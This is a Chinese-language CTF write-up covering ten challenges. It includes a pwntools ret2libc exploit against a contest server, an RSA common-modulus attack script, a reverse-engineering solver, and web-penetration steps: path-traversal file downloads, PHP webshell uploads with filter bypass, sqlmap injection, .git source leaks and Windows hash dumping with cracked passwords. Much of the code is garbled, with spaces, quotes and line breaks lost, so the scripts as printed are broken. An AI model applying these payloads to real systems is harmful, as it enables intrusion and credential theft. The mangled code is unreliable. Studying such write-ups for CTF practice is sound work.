幾道CTF題的writeup

幾道CTF題的writeup

來自專欄網安實驗室4 人贊了文章

原創： Z.thero 合天智匯

0x01 PlainR2B這是一道比較簡單的PWN題目，首先拖到IDA里簡單看了一下程序，如圖

發現在讀取，沒有棧保護，所以，在read0x34時，可能替換game返回址址，先通過write(1,write,4)(game作為write返回地址)。這樣讀出write地址，這樣就可以得到system地址，因為又循環運行了，同樣在0x804A06C寫入/bin/sh,這樣system就能運行。

Pythonexp如下：frompwn import *

defrungameAgainPoc(p,yourname,flag):

p.recvuntil("First,whats your name?
")

p.send(yourname+ "
")

p.recvuntil("doyou want to get flag?
")

p.send(flag)

pwnelf= ELF("./pwn")

libcelf= ELF("./libc-2.23.so")

gameadd= 0x080485CB

plt_write= pwnelf.symbols[write]

got_write= pwnelf.got[write]

#p= process(./pwn,env={LD_PRELOAD:./libc-2.23.so})

p= remote(117.50.60.184, 12345)

rungameAgainPoc(p,"ichuqiu","0"*32+ p32(plt_write)+

p32(gameadd)+ p32(1) + p32(got_write) + p32(4))

write_addr= u32(p.recv(4))

print"pwn write " ,hex(write_addr)

libcelf_system_add= libcelf.symbols["system"] +

write_addr- libcelf.symbols["write"]

print"pwn libcelf_system_add",hex(libcelf_system_add)

rungameAgainPoc(p,"/bin/sh","0"*32+

p32(libcelf_system_add)+p32(gameadd)+ p32(0x804A06C))

p.interactive()

flag{62c51c85-1516-4ad8-989c-58ce8c29642e}

0x02 AntidbgIDA查找關鍵函數，發現有一個循環比較

初步判斷，是一個8位數，於是分開比較

#[ebp+var_6C]01050D02070106010206000B07010C06

#[ebp+var_4C]02080602

#[ebp+var_5C]0100070D020108080D000103040D0303

#[ebp+var_48]02050009

#[ebp+var_44]00000D02

defcover(buf):

buf= buf.decode("hex")

rbuf= ""

fori in range(len(buf) - 1,-1,-1):

rbuf+= buf[i]

returnrbuf

defcover_hex_lines(buf):

returnbuf.replace("","").replace("
","").replace("
","").decode("hex")

var_6c=cover("01050D02070106010206000B07010C06")

+cover("0100070D020108080D000103040D0303")

+cover("02080602") + cover("02050009")

+cover("00000D02")

#printlen(var_6c)

byte_402178= """02 02 02 02 03 01 01 02

0101 02 01 01 00 01 01 02 02 00 01 01 01 01 00

0101 02 02 00 01 01 02 02 01 01 01 01 01 02 01

0103 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0303 0D 04 03 01 00 0D 08 08 01 02 0D 07 00 01

060C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 01

0000 00 00 EF 28 68 5B 00 00 00 00 02 00 00 00

4800 00 00 E4 22 00 00 E4 16 00 00 00 00 00 00

EF28 68 5B 00 00 00 00 0C 00 00 00 14 00 00 00

2C23 00 00 2C 17 00 00 00 00 00 00 EF 28 68 5B

0000 00 00 0D 00 00 00 54 02 00 00 40 23 00 00

4017 00 00 00 00 00 00 EF 28 68 5B 00 00 00 00

0E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

A000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 30 40 00

E022 40 00 01 00 00 00 E8 20 40 00 00 00 00 00

0000 00 00 00 00 00 00 00 01 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00"""

.replace("","").replace("
","").replace("
","").decode("hex")

byte_402138= """00 00 00 00 01 00 00 00

0200 00 00 03 00 00 00 04 00 00 00 05 00 00 00

0600 00 00 07 00 00 00 08 00 00 00 09 00 00 00

0A00 00 00 0B 00 00 00 0C 00 00 00 0D 00 00 00

0E00 00 00 0F 00 00 00"""

.replace("","").replace("
","").replace("
","").decode("hex")

dword_403018="""0200 00 00 02 00 00 00

0200 00 00 02 00 00 00 00 00 00 00 00 00 00 00

""".replace("","").replace("
","").replace("
","").decode("hex")

#text:0040110E mov ecx, [ebp+var_4]

#.text:00401111 xor ecx, ebp

#.text:00401113 mov dword_40301C, 3

#.text:0040111D mov dword_403020, 6

#.text:00401127 mov dword_403024, 7

#內存值有所改變，所以修改一下

dword_403018= dword_403018[0:4] + x03 + dword_403018[5:8]

+x06 + dword_403018[9:12] + x07

+dword_403018[13:]

printdword_403018.encode("hex")

fori in range(0,42):

hightnum= ord(dword_403018[ord(byte_402178[i])*4])<<4

numbershow= hightnum+ ord(byte_402138[ord(var_6c[i])*4])

printchr(numbershow),

flag{06b16a72-51cc-4310-88ab-70ab68290e22}

0x03 sqli本題是sql約束攻擊，註冊用戶名為「admin 」，密碼為符合規定的密碼就可以，然後登陸就能看到flag

flag{b5a1f9c5-ac30-4e88-b460-e90bcb65bd70}

0x04 word這算是一道簽到題，word文件內容要求關注比賽官方平台公眾號，回復「部分flag」，獲得flag{71d7ce04-197a-4d，將doc文件重命名ZIP解壓，在document.xml發現第二部分flagb3-9c1d-0c419406a594}

flag{71d7ce04-197a-4db3-9c1d-0c419406a594}

0x05 RSAopensslrsa -inform PEM -in pubkey1.pem -pubin -text

Public-Key:(2048 bit)

Modulus:

00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:

3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:

8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:

bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:

a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:

c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:

dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:

ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:

4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:

70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:

03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:

79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:

ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:

2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:

e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:

e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:

8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:

42:17

Exponent:2333 (0x91d)

opensslrsa -inform PEM -in pubkey2.pem -pubin -text

Public-Key:(2048 bit)

Modulus:

00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:

3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:

8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:

bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:

a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:

c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:

dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:

ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:

4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:

70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:

03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:

79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:

ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:

2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:

e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:

e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:

8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:

42:17

Exponent:23333 (0x5b25).

可見，這兩個公鑰n是一樣的，只是e不同，使用RSA的共模攻擊

Python如下：

fromlibnum import n2s,s2n

fromgmpy2 import invert

importbase64

importgmpy2

defbignumber(n):

n= n.decode("hex")

rn= 0

forb in n:

rn= rn << 8

rn+= ord(b)

returnrn

n ="""00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:

3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:

8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:

bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:

a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:

c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:

dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:

ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:

4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:

70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:

03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:

79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:

ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:

2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:

e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:

e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:

8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:42:17"""

.replace(":","").replace("","").replace("
","").replace("
","")

#printn

n =bignumber(n)

printhex(n)

e1= 2333

e2=23333

defegcd(a,b):

ifa == 0:

return(b,0,1)

else:

g,y,x= egcd(b%a,a)

return(g,x - (b //a)*y,y)

flag1 = base64.b64decode(open("flag1.enc","rb").read())

flag2 = base64.b64decode(open("flag2.enc","rb").read())

c1= s2n(flag1)

c2= s2n(flag2)

c2= invert(c2,n)

#s= egcd(e1,e2)

#prints

s =gmpy2.gcdext(e1,e2)

#prints

s1= s[1]

s2= 0 - s[2]

prints1

prints2

m =pow(c1,s1,n) * pow(c2,s2,n)%n

printn2s(m)

flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe}

0x06 拋磚引玉

1.根據CMS版本，在wooyun鏡像站找到漏洞細節，

網站存在注入，但是資料庫用戶表為空，另外發現發現文件下載漏洞，

down.php?urls=data/../config.php

下載文件發現DB_user/mvoa用戶的密碼

define(DB_PWD,B!hpp3Dn1.);

flag值：B!hpp3Dn1.

2.http://url/www.zip，獲得網站備份文件，在config.php發現DB_user/root用戶的密碼

define(DB_PWD,mypasswd);

flag值：mypasswd

0x07 暗度陳倉

1.發現下載路徑

/u-are-admin/download.php?dl=

顯示文件找不到（u-Are-Admin/u-upload-file文件夾），發現關鍵目錄/u-Are-Admin/

flag值：/u-Are-Admin/

2.在/u-Are-Admin/目錄，可以上傳文件，上傳Php（大小寫繞過）一句話木馬，菜刀鏈接，netuser查看系統管理員Hack用戶的全名

flag值：Hacked356

3.shell能夠直接查看超級管理員用戶桌面根目錄admin.txt文件的內容

flag值：ad16a159581c7085c771f

0x08 瞞天過海

1.AWVS掃到注入點

/cat.php?id=2

sqlmap直接能跑，通過注入即可獲得後台管理員明文密碼，serverlog

flag值：serverlog

2.注入也能獲取root的密碼hash，

*21C5210729A90C69019F01FED76FAD4654F27167

然後cmd5解密得rootserver

flag值：rootserver

3.登錄進去，Downloadlog那裡下載日誌的地方，可以下載任意文件，可獲取C盤根目錄password.txt內容

/classes/downloadfile.php?file=../../../../../../password.txt

flag值：c9c35cf409344312146fa7546a94d1a6

0x09 偷梁換柱

1.AWVS掃到./git源碼泄露，用工具GitHack下載所有源碼，在資料庫文件發現用戶名，密碼（adminAdmin@pgsql）

flag值：Admin@pgsql

2.用用戶名密碼登錄，管理圖片可以上傳一句話木馬的圖片，然後看到圖片的地址，把地址去掉small，即使文件真正地址，

/admin/uploads/111.php.png

直接菜刀鏈接，png也能當成php直接解析，然後虛擬終端netuser即可獲得系統管理員ichunqiu用戶的全名。

3.菜刀能夠直接查看/tmp/access.log的內容的前16位

0x10 反客為主

1.掃描器掃到一個文件包含和一個大馬的txt文件，然後getshell，構造路徑為

url/info/include.php?filename=..//sjk-uploads/UareHack.txt

密碼是a，拿到shell可以獲取phpStudy目錄下Documents.txt的內容

2.拿到shell可以獲取ichunqiu用戶Desktop根目錄password.txt的內容3.getshell後，傳msf木馬無法反彈，最後使用QuarksPwDump拿到了ichunqiu用戶密碼HASH，在線破解拿到密碼

78beaa5511afa889b75e0c8d76954a50:4ffe895918a454ce0f872dad8af0b4da:::

flag值：123qwe123

（如需轉載請註明出處）

推薦閱讀：